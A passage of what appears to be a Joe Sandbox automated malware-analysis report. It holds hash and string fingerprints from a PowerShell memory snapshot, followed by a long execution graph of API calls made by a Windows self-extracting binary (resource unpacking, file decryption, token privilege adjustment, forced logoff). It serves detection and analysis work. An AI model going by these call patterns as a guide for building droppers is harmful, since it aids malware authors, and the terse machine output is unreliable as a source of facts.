                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q$4']q$$]q$$]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-978391646
                                                                                                                                                                                                                                                                                                                • Opcode ID: a6df2552e634660056247bc64446c76708c0b5d9c0621c483aca52810fc087cb
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9231c356d24f06ab27fb3af9090f688deeedc5197afb65aa9d408661a5f3546b
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6df2552e634660056247bc64446c76708c0b5d9c0621c483aca52810fc087cb
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B01F2717093854FCB3A827C6C206667FB66BC2924B2A45AFC181CF297DD248C05C3E3
                                                                                                                                                                                                                                                                                                                Function 079C21E0 Relevance: 5.0, Strings: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000007.00000002.2253750907.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_7_2_79c0000_powershell.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: $]q$$]q$J[j$J[j
                                                                                                                                                                                                                                                                                                                • API String ID: 0-817149878
                                                                                                                                                                                                                                                                                                                • Opcode ID: d31db3c8704f699c3683a150498f603aed2e5c3e98afcca33c140ed6c154e01b
                                                                                                                                                                                                                                                                                                                • Instruction ID: 68df9278dde3f337519120efa0337774cd8e473a142f763401dddfc72d4d24ba
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d31db3c8704f699c3683a150498f603aed2e5c3e98afcca33c140ed6c154e01b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF01F7B16543554FC73A832C18206926BBA7F86524B1585AFC4508B296CA34988583A7

                                                                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                                                                Execution Coverage:26.3%
                                                                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                Signature Coverage:12.3%
                                                                                                                                                                                                                                                                                                                Total number of Nodes:925
                                                                                                                                                                                                                                                                                                                Total number of Limit Nodes:46
                                                                                                                                                                                                                                                                                                                execution_graph 2066 7ff7600a58b0 2067 7ff7600a58ee 2066->2067 2068 7ff7600a5904 2066->2068 2069 7ff7600a58fc 2067->2069 2070 7ff7600a5770 CloseHandle 2067->2070 2068->2069 2072 7ff7600a5a29 2068->2072 2075 7ff7600a591a 2068->2075 2122 7ff7600a8470 2069->2122 2070->2069 2074 7ff7600a5a35 SetDlgItemTextA 2072->2074 2076 7ff7600a5a4a 2072->2076 2074->2076 2075->2069 2078 7ff7600a5982 DosDateTimeToFileTime 2075->2078 2076->2069 2094 7ff7600a51bc GetFileAttributesA 2076->2094 2078->2069 2080 7ff7600a59a3 LocalFileTimeToFileTime 2078->2080 2080->2069 2081 7ff7600a59c1 SetFileTime 2080->2081 2081->2069 2082 7ff7600a59e9 2081->2082 2091 7ff7600a5770 2082->2091 2087 7ff7600a5ac1 2113 7ff7600a527c LocalAlloc 2087->2113 2090 7ff7600a5acb 2090->2069 2092 7ff7600a578f SetFileAttributesA 2091->2092 2093 7ff7600a57a4 CloseHandle 2091->2093 2092->2069 2093->2092 2095 7ff7600a525f 2094->2095 2097 7ff7600a51de 2094->2097 2095->2069 2101 7ff7600a5380 2095->2101 2096 7ff7600a5246 SetFileAttributesA 2096->2095 2097->2095 2097->2096 2130 7ff7600a7ac8 FindResourceA 2097->2130 2100 7ff7600a523c 2100->2096 2102 7ff7600a53b3 2101->2102 2103 7ff7600a53d0 2102->2103 2104 7ff7600a53fd lstrcmpA 2102->2104 2105 7ff7600a4dcc 24 API calls 2103->2105 2106 7ff7600a53f4 2104->2106 2107 7ff7600a5454 2104->2107 2105->2106 2106->2069 2106->2087 2107->2106 2108 7ff7600a54a8 CreateFileA 2107->2108 2108->2106 2110 7ff7600a54de 2108->2110 2109 7ff7600a5561 CreateFileA 2109->2106 2110->2106 2110->2109 2111 7ff7600a5549 CharNextA 2110->2111 2112 7ff7600a5532 CreateDirectoryA 2110->2112 2111->2110 2112->2111 2114 7ff7600a52d4 LocalAlloc 2113->2114 2115 7ff7600a52aa 2113->2115 2118 7ff7600a52cd 2114->2118 2119 7ff7600a5300 2114->2119 2116 7ff7600a4dcc 24 API calls 2115->2116 2116->2118 2118->2090 2120 7ff7600a4dcc 24 API calls 2119->2120 2121 7ff7600a5323 LocalFree 2120->2121 2121->2118 2123 7ff7600a8479 2122->2123 2124 7ff7600a5af4 2123->2124 2125 7ff7600a84d0 RtlCaptureContext RtlLookupFunctionEntry 2123->2125 2126 7ff7600a8515 RtlVirtualUnwind 2125->2126 2127 7ff7600a8557 2125->2127 2126->2127 2185 7ff7600a8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2127->2185 2131 7ff7600a7b63 2130->2131 2132 7ff7600a7b03 LoadResource 2130->2132 2138 7ff7600a4dcc 2131->2138 2132->2131 2133 7ff7600a7b1d DialogBoxIndirectParamA FreeResource 2132->2133 2133->2131 2137 7ff7600a5228 2133->2137 2137->2095 2137->2096 2137->2100 2139 7ff7600a5024 2138->2139 2140 7ff7600a4e49 LoadStringA 2138->2140 2141 7ff7600a8470 7 API calls 2139->2141 2142 7ff7600a4e73 2140->2142 2143 7ff7600a4eb5 2140->2143 2144 7ff7600a5035 2141->2144 2167 7ff7600a7f04 2142->2167 2145 7ff7600a4f31 2143->2145 2152 7ff7600a4ec1 LocalAlloc 2143->2152 2144->2137 2149 7ff7600a4f44 LocalAlloc 2145->2149 2150 7ff7600a4f8e LocalAlloc 2145->2150 2148 7ff7600a4e81 MessageBoxA 2148->2139 2149->2139 2156 7ff7600a4f79 2149->2156 2150->2139 2162 7ff7600a4f2c 2150->2162 2152->2139 2158 7ff7600a4f14 2152->2158 2159 7ff7600a114c _vsnprintf 2156->2159 2157 7ff7600a4fbc MessageBeep 2160 7ff7600a7f04 13 API calls 2157->2160 2182 7ff7600a114c 2158->2182 2159->2162 2163 7ff7600a4fd3 2160->2163 2162->2157 2165 7ff7600a7e34 2 API calls 2163->2165 2166 7ff7600a4fdc MessageBoxA LocalFree 2163->2166 2165->2166 2166->2139 2168 7ff7600a7f44 GetVersionExA 2167->2168 2176 7ff7600a8076 2167->2176 2169 7ff7600a7f6d 2168->2169 2168->2176 2172 7ff7600a7f90 GetSystemMetrics 2169->2172 2169->2176 2170 7ff7600a8470 7 API calls 2171 7ff7600a4e78 2170->2171 2171->2148 2178 7ff7600a7e34 2171->2178 2173 7ff7600a7fa7 RegOpenKeyExA 2172->2173 2172->2176 2174 7ff7600a7fdc RegQueryValueExA RegCloseKey 2173->2174 2173->2176 2174->2176 2177 7ff7600a8026 2174->2177 2175 7ff7600a8065 CharNextA 2175->2177 2176->2170 2177->2175 2177->2176 2179 7ff7600a7e5a EnumResourceLanguagesA 2178->2179 2180 7ff7600a7edd 2178->2180 2179->2180 2181 7ff7600a7e9f EnumResourceLanguagesA 2179->2181 2180->2148 2181->2180 2183 7ff7600a1178 _vsnprintf 2182->2183 2184 7ff7600a1199 2182->2184 2183->2184 2184->2162 2186 7ff7600a5690 2193 7ff7600a3b40 2186->2193 2189 7ff7600a56c2 WriteFile 2190 7ff7600a56ba 2189->2190 2191 7ff7600a56f9 2189->2191 2191->2190 2192 7ff7600a5725 SendDlgItemMessageA 2191->2192 2192->2190 2194 7ff7600a3b4c MsgWaitForMultipleObjects 2193->2194 2195 7ff7600a3b74 PeekMessageA 2194->2195 2196 7ff7600a3be5 2194->2196 2195->2194 2199 7ff7600a3b99 2195->2199 2196->2189 2196->2190 2197 7ff7600a3ba7 DispatchMessageA 2198 7ff7600a3bb8 PeekMessageA 2197->2198 2198->2199 2199->2194 2199->2196 2199->2197 2199->2198 2956 7ff7600a3530 2957 7ff7600a3802 EndDialog 2956->2957 2958 7ff7600a3557 2956->2958 2961 7ff7600a356b 2957->2961 2959 7ff7600a3567 2958->2959 2960 7ff7600a377e GetDesktopWindow 2958->2960 2959->2961 2964 7ff7600a3635 GetDlgItemTextA 2959->2964 2965 7ff7600a357b 2959->2965 3008 7ff7600a4c68 6 API calls 2960->3008 2972 7ff7600a365e 2964->2972 2989 7ff7600a36e9 2964->2989 2967 7ff7600a3584 2965->2967 2968 7ff7600a3618 EndDialog 2965->2968 2966 7ff7600a37d8 GetDlgItem EnableWindow 2966->2961 2967->2961 2969 7ff7600a3591 LoadStringA 2967->2969 2968->2961 2970 7ff7600a35de 2969->2970 2971 7ff7600a35bd 2969->2971 2993 7ff7600a4a60 LoadLibraryA 2970->2993 2976 7ff7600a4dcc 24 API calls 2971->2976 2975 7ff7600a3694 GetFileAttributesA 2972->2975 2972->2989 2974 7ff7600a4dcc 24 API calls 2974->2961 2978 7ff7600a36a8 2975->2978 2979 7ff7600a36fa 2975->2979 2992 7ff7600a35d7 2976->2992 2981 7ff7600a4dcc 24 API calls 2978->2981 2983 7ff7600a7ba8 CharPrevA 2979->2983 2980 7ff7600a35eb SetDlgItemTextA 2980->2961 2980->2971 2985 7ff7600a36cb 2981->2985 2982 7ff7600a374b EndDialog 2982->2961 2984 7ff7600a370e 2983->2984 2986 7ff7600a6b70 31 API calls 2984->2986 2985->2961 2987 7ff7600a36d4 CreateDirectoryA 2985->2987 2988 7ff7600a3716 2986->2988 2987->2979 2987->2989 2988->2989 2990 7ff7600a3721 2988->2990 2989->2974 2991 7ff7600a6ca4 38 API calls 2990->2991 2990->2992 2991->2992 2992->2961 2992->2982 2994 7ff7600a4c20 2993->2994 2995 7ff7600a4aa0 GetProcAddress 2993->2995 2999 7ff7600a4dcc 24 API calls 2994->2999 2996 7ff7600a4ac2 GetProcAddress 2995->2996 2997 7ff7600a4c0a FreeLibrary 2995->2997 2996->2997 2998 7ff7600a4ae2 GetProcAddress 2996->2998 2997->2994 2998->2997 3000 7ff7600a4b04 2998->3000 3001 7ff7600a35e3 2999->3001 3002 7ff7600a4b13 GetTempPathA 3000->3002 3003 7ff7600a4b65 3000->3003 3001->2961 3001->2980 3004 7ff7600a4b2b 3002->3004 3007 7ff7600a4bee FreeLibrary 3003->3007 3004->3004 3005 7ff7600a4b34 CharPrevA 3004->3005 3005->3003 3006 7ff7600a4b4e CharPrevA 3005->3006 3006->3003 3007->3001 3010 7ff7600a4d3f SetWindowPos 3008->3010 3011 7ff7600a8470 7 API calls 3010->3011 3012 7ff7600a3795 SetWindowTextA SendDlgItemMessageA 3011->3012 3012->2961 3012->2966 3013 7ff7600a4a30 3014 7ff7600a4a50 3013->3014 3015 7ff7600a4a39 SendMessageA 3013->3015 3015->3014 3016 7ff7600a78b0 3017 7ff7600a78fd 3016->3017 3018 7ff7600a7ba8 CharPrevA 3017->3018 3019 7ff7600a7935 CreateFileA 3018->3019 3020 7ff7600a7970 3019->3020 3021 7ff7600a797e WriteFile 3019->3021 3024 7ff7600a8470 7 API calls 3020->3024 3022 7ff7600a79a2 CloseHandle 3021->3022 3022->3020 3025 7ff7600a79d5 3024->3025 3026 7ff7600a5870 GlobalAlloc 3027 7ff7600a33f0 3028 7ff7600a3402 3027->3028 3029 7ff7600a34ec 3027->3029 3032 7ff7600a340f 3028->3032 3033 7ff7600a3441 GetDesktopWindow 3028->3033 3030 7ff7600a34e5 3029->3030 3031 7ff7600a34f5 SendDlgItemMessageA 3029->3031 3031->3030 3032->3030 3034 7ff7600a3430 EndDialog 3032->3034 3035 7ff7600a4c68 14 API calls 3033->3035 3034->3030 3036 7ff7600a3458 6 API calls 3035->3036 3036->3030 3037 7ff7600a80d0 3039 7ff7600a80e2 3037->3039 3044 7ff7600a8818 GetModuleHandleW 3039->3044 3040 7ff7600a8149 __set_app_type 3041 7ff7600a8186 3040->3041 3042 7ff7600a818f __setusermatherr 3041->3042 3043 7ff7600a819c 3041->3043 3042->3043 3045 7ff7600a882d 3044->3045 3045->3040 3046 7ff7600a3910 3047 7ff7600a3933 3046->3047 3067 7ff7600a3a09 3046->3067 3048 7ff7600a3a11 GetDesktopWindow 3047->3048 3049 7ff7600a3948 3047->3049 3047->3067 3052 7ff7600a4c68 14 API calls 3048->3052 3053 7ff7600a394c 3049->3053 3054 7ff7600a397b 3049->3054 3050 7ff7600a3954 3051 7ff7600a3b1a EndDialog 3051->3050 3055 7ff7600a3a2f 3052->3055 3053->3050 3056 7ff7600a395b TerminateThread 3053->3056 3054->3050 3057 7ff7600a3985 ResetEvent 3054->3057 3058 7ff7600a3a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 3055->3058 3059 7ff7600a3a9b SetWindowTextA CreateThread 3055->3059 3056->3051 3060 7ff7600a4dcc 24 API calls 3057->3060 3058->3059 3059->3050 3061 7ff7600a3ae8 3059->3061 3062 7ff7600a39c3 3060->3062 3063 7ff7600a4dcc 24 API calls 3061->3063 3064 7ff7600a39e4 SetEvent 3062->3064 3065 7ff7600a39cc SetEvent 3062->3065 3063->3067 3066 7ff7600a3b40 4 API calls 3064->3066 3065->3050 3066->3067 3067->3050 3067->3051 3068 7ff7600a8b30 _XcptFilter 3069 7ff7600a81b0 __getmainargs 3070 7ff7600a8750 3071 7ff7600a8782 3070->3071 3072 7ff7600a875f 3070->3072 3072->3071 3073 7ff7600a877b ?terminate@ 3072->3073 3073->3071 3074 7ff7600a8790 SetUnhandledExceptionFilter 3075 7ff7600a33a0 3076 7ff7600a33ac 3075->3076 3077 7ff7600a33bb CallWindowProcA 3075->3077 3076->3077 3078 7ff7600a33b7 3076->3078 3077->3078 3079 7ff7600a55e0 3080 7ff7600a5641 ReadFile 3079->3080 3081 7ff7600a560d 3079->3081 3080->3081 3082 7ff7600a57e0 3083 7ff7600a581e 3082->3083 3085 7ff7600a57fc 3082->3085 3084 7ff7600a583d SetFilePointer 3083->3084 3083->3085 3084->3085 3086 7ff7600a3840 3087 7ff7600a3852 3086->3087 3088 7ff7600a385a 3086->3088 3087->3088 3090 7ff7600a388e GetDesktopWindow 3087->3090 3089 7ff7600a38ec EndDialog 3088->3089 3092 7ff7600a385f 3088->3092 3089->3092 3091 7ff7600a4c68 14 API calls 3090->3091 3093 7ff7600a38a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3091->3093 3093->3092 3094 7ff7600a1500 3095 7ff7600a1530 3094->3095 3096 7ff7600a1557 GetDesktopWindow 3094->3096 3097 7ff7600a1553 3095->3097 3099 7ff7600a1542 EndDialog 3095->3099 3098 7ff7600a4c68 14 API calls 3096->3098 3101 7ff7600a8470 7 API calls 3097->3101 3100 7ff7600a156e LoadStringA SetDlgItemTextA MessageBeep 3098->3100 3099->3097 3100->3097 3102 7ff7600a15d0 3101->3102 2200 7ff7600a8200 2219 7ff7600a8964 2200->2219 2204 7ff7600a824b 2205 7ff7600a825d 2204->2205 2206 7ff7600a8277 Sleep 2204->2206 2207 7ff7600a826d _amsg_exit 2205->2207 2209 7ff7600a8284 2205->2209 2206->2204 2207->2209 2208 7ff7600a82fc _initterm 2212 7ff7600a8319 _IsNonwritableInCurrentImage 2208->2212 2209->2208 2210 7ff7600a82dd 2209->2210 2209->2212 2211 7ff7600a83f8 _ismbblead 2211->2212 2212->2210 2212->2211 2213 7ff7600a837d 2212->2213 2223 7ff7600a2c54 GetVersion 2213->2223 2216 7ff7600a83cf 2216->2210 2218 7ff7600a83d8 _cexit 2216->2218 2217 7ff7600a83c7 exit 2217->2216 2218->2210 2220 7ff7600a8990 6 API calls 2219->2220 2221 7ff7600a8209 GetStartupInfoW 2219->2221 2222 7ff7600a8a0f 2220->2222 2221->2204 2222->2221 2224 7ff7600a2cc3 2223->2224 2225 7ff7600a2c7b 2223->2225 2247 7ff7600a2db4 2224->2247 2225->2224 2226 7ff7600a2c7f GetModuleHandleW 2225->2226 2226->2224 2228 7ff7600a2c97 GetProcAddress 2226->2228 2228->2224 2230 7ff7600a2cb2 2228->2230 2230->2224 2231 7ff7600a2d7f 2232 7ff7600a2d97 2231->2232 2233 7ff7600a2d8b CloseHandle 2231->2233 2232->2216 2232->2217 2233->2232 2238 7ff7600a2d29 2238->2231 2239 7ff7600a2d33 2238->2239 2240 7ff7600a2d5e 2238->2240 2242 7ff7600a4dcc 24 API calls 2239->2242 2243 7ff7600a2d67 ExitWindowsEx 2240->2243 2244 7ff7600a2d7a 2240->2244 2245 7ff7600a2d59 2242->2245 2243->2231 2364 7ff7600a1c0c GetCurrentProcess OpenProcessToken 2244->2364 2245->2231 2245->2240 2248 7ff7600a8b09 2247->2248 2249 7ff7600a2df9 memset memset 2248->2249 2372 7ff7600a5050 FindResourceA SizeofResource 2249->2372 2252 7ff7600a2e53 CreateEventA SetEvent 2254 7ff7600a5050 7 API calls 2252->2254 2253 7ff7600a2fb5 2255 7ff7600a4dcc 24 API calls 2253->2255 2256 7ff7600a2e92 2254->2256 2258 7ff7600a2fd9 2255->2258 2257 7ff7600a2e96 2256->2257 2259 7ff7600a2ed5 2256->2259 2262 7ff7600a2fa3 2256->2262 2260 7ff7600a4dcc 24 API calls 2257->2260 2261 7ff7600a8470 7 API calls 2258->2261 2263 7ff7600a5050 7 API calls 2259->2263 2292 7ff7600a2eb4 2260->2292 2264 7ff7600a2cd4 2261->2264 2377 7ff7600a70a8 2262->2377 2266 7ff7600a2eec 2263->2266 2264->2231 2293 7ff7600a30ec 2264->2293 2266->2257 2268 7ff7600a2efe CreateMutexA 2266->2268 2268->2262 2270 7ff7600a2f22 GetLastError 2268->2270 2269 7ff7600a2fc4 2271 7ff7600a2fde FindResourceExA 2269->2271 2272 7ff7600a2fcd 2269->2272 2270->2262 2273 7ff7600a2f35 2270->2273 2275 7ff7600a2fff LoadResource 2271->2275 2276 7ff7600a3014 2271->2276 2404 7ff7600a204c 2272->2404 2277 7ff7600a2f62 2273->2277 2278 7ff7600a2f4a 2273->2278 2275->2276 2281 7ff7600a3029 2276->2281 2282 7ff7600a301d #17 2276->2282 2279 7ff7600a4dcc 24 API calls 2277->2279 2280 7ff7600a4dcc 24 API calls 2278->2280 2284 7ff7600a2f7c 2279->2284 2285 7ff7600a2f60 2280->2285 2281->2258 2283 7ff7600a303a 2281->2283 2282->2281 2419 7ff7600a3bf4 GetVersionExA 2283->2419 2284->2262 2286 7ff7600a2f81 CloseHandle 2284->2286 2285->2286 2286->2258 2291 7ff7600a7ac8 28 API calls 2291->2292 2292->2258 2294 7ff7600a3141 2293->2294 2295 7ff7600a3116 2293->2295 2529 7ff7600a5fe4 2294->2529 2297 7ff7600a3134 2295->2297 2509 7ff7600a60a4 2295->2509 2687 7ff7600a3f74 2297->2687 2301 7ff7600a3236 2306 7ff7600a8470 7 API calls 2301->2306 2308 7ff7600a2ce1 2306->2308 2307 7ff7600a315b GetSystemDirectoryA 2309 7ff7600a7ba8 CharPrevA 2307->2309 2339 7ff7600a61ec 2308->2339 2310 7ff7600a3186 LoadLibraryA 2309->2310 2311 7ff7600a319f GetProcAddress 2310->2311 2312 7ff7600a31c9 FreeLibrary 2310->2312 2311->2312 2313 7ff7600a31ba DecryptFileA 2311->2313 2314 7ff7600a31e4 2312->2314 2315 7ff7600a3273 SetCurrentDirectoryA 2312->2315 2313->2312 2314->2315 2317 7ff7600a31f0 GetWindowsDirectoryA 2314->2317 2316 7ff7600a320d 2315->2316 2322 7ff7600a3291 2315->2322 2320 7ff7600a4dcc 24 API calls 2316->2320 2317->2316 2319 7ff7600a325a 2317->2319 2318 7ff7600a331f 2318->2301 2325 7ff7600a2318 18 API calls 2318->2325 2332 7ff7600a3347 2318->2332 2592 7ff7600a6ca4 GetCurrentDirectoryA SetCurrentDirectoryA 2319->2592 2323 7ff7600a322b 2320->2323 2322->2318 2326 7ff7600a32fb 2322->2326 2329 7ff7600a32cb 2322->2329 2706 7ff7600a7700 GetLastError 2323->2706 2325->2332 2619 7ff7600a5d90 2326->2619 2328 7ff7600a3368 2328->2301 2336 7ff7600a3383 2328->2336 2333 7ff7600a7ac8 28 API calls 2329->2333 2330 7ff7600a3230 2330->2301 2332->2328 2641 7ff7600a40c4 2332->2641 2334 7ff7600a32f6 2333->2334 2334->2301 2707 7ff7600a772c 2334->2707 2717 7ff7600a494c 2336->2717 2340 7ff7600a6214 2339->2340 2341 7ff7600a624c LocalFree LocalFree 2340->2341 2343 7ff7600a6229 SetFileAttributesA DeleteFileA 2340->2343 2350 7ff7600a6273 2340->2350 2341->2340 2342 7ff7600a6387 2345 7ff7600a8470 7 API calls 2342->2345 2343->2341 2344 7ff7600a6311 2344->2342 2346 7ff7600a632d RegOpenKeyExA 2344->2346 2347 7ff7600a2ce8 2345->2347 2346->2342 2348 7ff7600a635e RegDeleteValueA RegCloseKey 2346->2348 2347->2231 2347->2238 2353 7ff7600a2318 2347->2353 2348->2342 2349 7ff7600a62f4 SetCurrentDirectoryA 2352 7ff7600a204c 16 API calls 2349->2352 2350->2344 2350->2349 2351 7ff7600a7c40 4 API calls 2350->2351 2351->2349 2352->2344 2354 7ff7600a2330 2353->2354 2355 7ff7600a2447 2353->2355 2357 7ff7600a23cb RegOpenKeyExA 2354->2357 2360 7ff7600a233a 2354->2360 2948 7ff7600a2244 GetWindowsDirectoryA 2355->2948 2358 7ff7600a23c3 2357->2358 2359 7ff7600a23fe RegQueryInfoKeyA 2357->2359 2358->2238 2361 7ff7600a23a8 RegCloseKey 2359->2361 2360->2358 2362 7ff7600a234a RegOpenKeyExA 2360->2362 2361->2358 2362->2358 2363 7ff7600a237d RegQueryValueExA 2362->2363 2363->2361 2365 7ff7600a1c6f LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2364->2365 2368 7ff7600a1c4c 2364->2368 2366 7ff7600a1cec ExitWindowsEx 2365->2366 2365->2368 2366->2368 2369 7ff7600a1c68 2366->2369 2367 7ff7600a4dcc 24 API calls 2367->2369 2368->2367 2370 7ff7600a8470 7 API calls 2369->2370 2371 7ff7600a1d1a 2370->2371 2371->2231 2373 7ff7600a2e43 2372->2373 2374 7ff7600a509b 2372->2374 2373->2252 2373->2253 2374->2373 2375 7ff7600a50a4 FindResourceA LoadResource LockResource 2374->2375 2375->2373 2376 7ff7600a50e3 memcpy_s FreeResource 2375->2376 2376->2373 2378 7ff7600a7566 2377->2378 2402 7ff7600a70f2 2377->2402 2379 7ff7600a8470 7 API calls 2378->2379 2381 7ff7600a2fb1 2379->2381 2380 7ff7600a71ca 2380->2378 2383 7ff7600a71e7 GetModuleFileNameA 2380->2383 2381->2253 2381->2269 2382 7ff7600a711d CharNextA 2382->2402 2384 7ff7600a720f 2383->2384 2385 7ff7600a721c 2383->2385 2453 7ff7600a7d68 2384->2453 2385->2378 2387 7ff7600a76f1 2462 7ff7600a8648 RtlCaptureContext RtlLookupFunctionEntry 2387->2462 2390 7ff7600a7238 CharUpperA 2391 7ff7600a766f 2390->2391 2390->2402 2392 7ff7600a4dcc 24 API calls 2391->2392 2393 7ff7600a7692 2392->2393 2394 7ff7600a76aa ExitProcess 2393->2394 2395 7ff7600a769e CloseHandle 2393->2395 2395->2394 2396 7ff7600a739d CharUpperA 2396->2402 2397 7ff7600a7346 CompareStringA 2397->2402 2398 7ff7600a73fb CharUpperA 2398->2402 2399 7ff7600a7492 CharUpperA 2399->2402 2400 7ff7600a72d0 CharUpperA 2400->2402 2401 7ff7600a7ce8 IsDBCSLeadByte CharNextA 2401->2402 2402->2378 2402->2380 2402->2382 2402->2387 2402->2390 2402->2396 2402->2397 2402->2398 2402->2399 2402->2400 2402->2401 2458 7ff7600a7ba8 2402->2458 2405 7ff7600a2213 2404->2405 2408 7ff7600a2086 2404->2408 2406 7ff7600a8470 7 API calls 2405->2406 2407 7ff7600a2222 2406->2407 2407->2258 2409 7ff7600a20dc FindFirstFileA 2408->2409 2409->2405 2417 7ff7600a20fe 2409->2417 2410 7ff7600a21a3 2414 7ff7600a21b4 SetFileAttributesA DeleteFileA 2410->2414 2411 7ff7600a2138 lstrcmpA 2412 7ff7600a2158 lstrcmpA 2411->2412 2413 7ff7600a21d9 FindNextFileA 2411->2413 2412->2413 2412->2417 2415 7ff7600a21f5 FindClose RemoveDirectoryA 2413->2415 2413->2417 2414->2413 2415->2405 2416 7ff7600a7ba8 CharPrevA 2416->2417 2417->2410 2417->2411 2417->2413 2417->2416 2418 7ff7600a204c 8 API calls 2417->2418 2418->2417 2421 7ff7600a3c59 2419->2421 2426 7ff7600a3c4f 2419->2426 2420 7ff7600a4dcc 24 API calls 2422 7ff7600a3f05 2420->2422 2421->2422 2421->2426 2427 7ff7600a3db1 2421->2427 2468 7ff7600a2834 2421->2468 2423 7ff7600a8470 7 API calls 2422->2423 2424 7ff7600a3042 2423->2424 2424->2258 2434 7ff7600a12ec 2424->2434 2426->2420 2426->2422 2427->2422 2427->2426 2428 7ff7600a3eb7 MessageBeep 2427->2428 2429 7ff7600a7f04 13 API calls 2428->2429 2430 7ff7600a3eca 2429->2430 2431 7ff7600a3ed3 MessageBoxA 2430->2431 2432 7ff7600a7e34 2 API calls 2430->2432 2431->2422 2432->2431 2435 7ff7600a133c 2434->2435 2436 7ff7600a14b5 2434->2436 2500 7ff7600a11cc LoadLibraryA 2435->2500 2438 7ff7600a8470 7 API calls 2436->2438 2440 7ff7600a14da 2438->2440 2440->2258 2440->2291 2441 7ff7600a134d GetCurrentProcess OpenProcessToken 2441->2436 2442 7ff7600a1377 GetTokenInformation 2441->2442 2443 7ff7600a14a0 CloseHandle 2442->2443 2444 7ff7600a13a0 GetLastError 2442->2444 2443->2436 2444->2443 2445 7ff7600a13b5 LocalAlloc 2444->2445 2445->2443 2446 7ff7600a13d2 GetTokenInformation 2445->2446 2447 7ff7600a1491 LocalFree 2446->2447 2448 7ff7600a13fc AllocateAndInitializeSid 2446->2448 2447->2443 2448->2447 2451 7ff7600a1445 2448->2451 2449 7ff7600a1481 FreeSid 2449->2447 2450 7ff7600a1452 EqualSid 2450->2451 2452 7ff7600a1476 2450->2452 2451->2449 2451->2450 2451->2452 2452->2449 2454 7ff7600a7d88 2453->2454 2455 7ff7600a7dd9 2453->2455 2456 7ff7600a7d90 IsDBCSLeadByte 2454->2456 2457 7ff7600a7db6 CharNextA 2454->2457 2455->2385 2456->2454 2457->2454 2457->2455 2459 7ff7600a7bc8 2458->2459 2459->2459 2460 7ff7600a7bec CharPrevA 2459->2460 2461 7ff7600a7bda 2459->2461 2460->2461 2461->2402 2463 7ff7600a8685 RtlVirtualUnwind 2462->2463 2464 7ff7600a86c7 2462->2464 2463->2464 2467 7ff7600a8494 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2464->2467 2469 7ff7600a2a2f 2468->2469 2479 7ff7600a2872 2468->2479 2470 7ff7600a2a50 2469->2470 2471 7ff7600a2a41 GlobalFree 2469->2471 2470->2427 2471->2470 2473 7ff7600a28a5 GetFileVersionInfoSizeA 2474 7ff7600a28c2 GlobalAlloc 2473->2474 2473->2479 2474->2469 2475 7ff7600a28e1 GlobalLock 2474->2475 2475->2469 2476 7ff7600a28fc GetFileVersionInfoA 2475->2476 2477 7ff7600a2920 VerQueryValueA 2476->2477 2476->2479 2478 7ff7600a29ed GlobalUnlock 2477->2478 2477->2479 2478->2479 2479->2469 2479->2473 2479->2478 2480 7ff7600a29d9 GlobalUnlock 2479->2480 2481 7ff7600a261c 2479->2481 2480->2469 2482 7ff7600a27e0 GetSystemDirectoryA 2481->2482 2483 7ff7600a265b CharUpperA CharNextA CharNextA 2481->2483 2486 7ff7600a27f1 2482->2486 2484 7ff7600a269c 2483->2484 2485 7ff7600a27dd 2483->2485 2487 7ff7600a26a6 2484->2487 2488 7ff7600a27c7 GetWindowsDirectoryA 2484->2488 2485->2482 2489 7ff7600a2805 2486->2489 2491 7ff7600a7ba8 CharPrevA 2486->2491 2493 7ff7600a7ba8 CharPrevA 2487->2493 2488->2486 2490 7ff7600a8470 7 API calls 2489->2490 2492 7ff7600a2814 2490->2492 2491->2489 2492->2479 2494 7ff7600a2705 RegOpenKeyExA 2493->2494 2494->2486 2495 7ff7600a2738 RegQueryValueExA 2494->2495 2496 7ff7600a27b4 RegCloseKey 2495->2496 2497 7ff7600a276b 2495->2497 2496->2486 2498 7ff7600a2774 ExpandEnvironmentStringsA 2497->2498 2499 7ff7600a2792 2497->2499 2498->2499 2499->2496 2501 7ff7600a1221 GetProcAddress 2500->2501 2502 7ff7600a12bb 2500->2502 2503 7ff7600a123f AllocateAndInitializeSid 2501->2503 2504 7ff7600a12ac FreeLibrary 2501->2504 2505 7ff7600a8470 7 API calls 2502->2505 2503->2504 2506 7ff7600a1288 FreeSid 2503->2506 2504->2502 2507 7ff7600a12ca 2505->2507 2506->2504 2507->2436 2507->2441 2510 7ff7600a5050 7 API calls 2509->2510 2511 7ff7600a60bf LocalAlloc 2510->2511 2512 7ff7600a610b 2511->2512 2513 7ff7600a60dd 2511->2513 2515 7ff7600a5050 7 API calls 2512->2515 2514 7ff7600a4dcc 24 API calls 2513->2514 2516 7ff7600a60fb 2514->2516 2517 7ff7600a611d 2515->2517 2730 7ff7600a7700 GetLastError 2516->2730 2518 7ff7600a6121 2517->2518 2519 7ff7600a615a lstrcmpA 2517->2519 